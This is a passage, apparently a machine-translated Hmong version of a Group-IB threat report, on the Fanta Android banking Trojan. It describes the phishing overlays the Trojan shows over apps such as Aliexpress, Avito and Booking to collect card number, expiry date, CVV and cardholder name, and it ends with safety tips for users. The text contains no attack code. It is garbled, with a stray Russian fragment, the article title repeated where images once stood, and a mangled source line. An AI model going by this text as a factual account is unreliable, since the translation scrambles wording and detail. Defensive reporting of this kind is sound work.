    Fanta txheeb xyuas cov ntawv thov twg ua haujlwm ntawm lub cuab yeej muaj kab mob. Yog tias daim ntawv thov kev txaus siab tau qhib, Trojan qhia lub qhov rai phishing nyob rau sab saum toj ntawm txhua tus, uas yog daim ntawv rau nkag mus rau cov ntaub ntawv hauv txhab nyiaj. Tus neeg siv yuav tsum sau cov ntaub ntawv hauv qab no:

    • Омер карты
    • Daim npav hnub tas sij hawm
    • CVV
    • Lub npe daim npav (tsis yog rau txhua lub tsev txhab nyiaj)

    Nyob ntawm daim ntawv thov khiav, qhov sib txawv phishing yuav tshwm sim. Hauv qab no yog cov piv txwv ntawm ib co ntawm lawv:

    Aliexpress:

    Leysya, Fanta: lub tswv yim tshiab rau Android Trojan qub
    Avito:

    Leysya, Fanta: lub tswv yim tshiab rau Android Trojan qub
    Rau qee qhov kev siv, e.g. Google Play Market, Aviasales, Pandao, Booking, Trivago:
    Leysya, Fanta: lub tswv yim tshiab rau Android Trojan qub

    Yuav ua li cas nws tiag

    Hmoov zoo, tus neeg uas tau txais cov lus SMS tau piav qhia thaum pib ntawm tsab xov xwm tau dhau los ua tus kws tshaj lij cybersecurity. Yog li ntawd, qhov tseeb, tsis yog tus thawj coj tus qauv txawv ntawm qhov tau hais ua ntej: ib tus neeg tau txais SMS nthuav, tom qab ntawd nws tau muab rau Pab Pawg-IB Threat Hunting Intelligence pab pawg. Qhov tshwm sim ntawm kev tawm tsam yog kab lus no. Zoo siab xaus, txoj cai? Txawm li cas los xij, tsis yog txhua zaj dab neeg xaus kom tiav, thiab kom koj li tsis zoo li tus thawj coj txiav nrog kev poob nyiaj, feem ntau nws txaus los ua raws li cov cai hauv qab no tau piav qhia ntev:

    • tsis txhob nruab cov ntawv thov rau lub xov tooj ntawm tes nrog Android OS los ntawm lwm qhov chaw uas tsis yog Google Play
    • Thaum txhim kho daim ntawv thov, xyuam xim tshwj xeeb rau cov cai thov los ntawm daim ntawv thov
    • them sai sai rau qhov txuas ntxiv ntawm cov ntaub ntawv rub tawm
    • nruab Android OS hloov tshiab tsis tu ncua
    • tsis txhob mus saib cov ntaub ntawv tsis txaus ntseeg thiab tsis txhob rub tawm cov ntaub ntawv los ntawm qhov ntawd
    • Tsis txhob nyem rau ntawm qhov txuas tau txais hauv SMS lus.

Tau qhov twg los: www.hab.com

Ntxiv ib saib